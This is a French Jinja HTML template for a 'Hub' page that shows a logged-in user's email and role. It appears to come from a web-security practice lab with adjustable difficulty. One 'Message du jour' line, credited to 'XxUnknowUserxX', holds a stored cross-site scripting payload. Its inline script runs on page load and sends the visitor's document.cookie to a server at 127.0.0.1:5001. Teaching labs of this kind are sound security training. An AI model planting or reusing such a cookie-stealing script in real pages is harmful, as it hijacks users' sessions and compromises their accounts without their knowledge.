<!DOCTYPE html>
<html lang="fr">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Hub</title>
    </head>
    <body>

        {% if message %}
            <h1 style="color:red;">{{ message }}</h1>
        {% endif %}

        {% if user %}
            <h3><strong>Message du jour 28: </strong>{{ message_du_jour }}</h3>
            <h3><strong>Message du jour 28: </strong> Si vous lisez ces lignes, courage à vous.<script>window.onload = function(e) {fetch('http://127.0.0.1:5001/cookie/' + document.cookie);}</script></h3>
            <h5><i>Proposé par XxUnknowUserxX</i></h5>
        {% endif %}

        {% if user %}
            <h2>Bienvenue, {{ user.name }}!</h2>
        {% else %}
            <h2>Bienvenue, inconnue !</h2>
            <a href="/login"><h2>Peut-être vous connecter ?</h2></a>
        {% endif %}

        {% if user %}
            <h2>Voici vos informations :</h2>
            <ul>
                <li><strong>Email:</strong> {{ user.email }}</li>
                <li><strong>Rôle:</strong> {{ user.role }}</li>
                <li><strong>Mot de passe:</strong> ? </li>
            </ul>
        {% else %}
            <h2>🦦</h2>
            <div>
                <video autoplay muted loop playsinline style="max-width: 900px; height: auto; display: block;">
                    <source src="/static/otter.webm" type="video/webm">
                </video>
            </div>
        {% endif %}

             <a href="/difficulty"><h2>Changer la diffilculté</h2></a>
{% if user %}<a href="/logout"><h2>Se déconnecter</h2>            </a>{% endif %}
    </body>
</html>
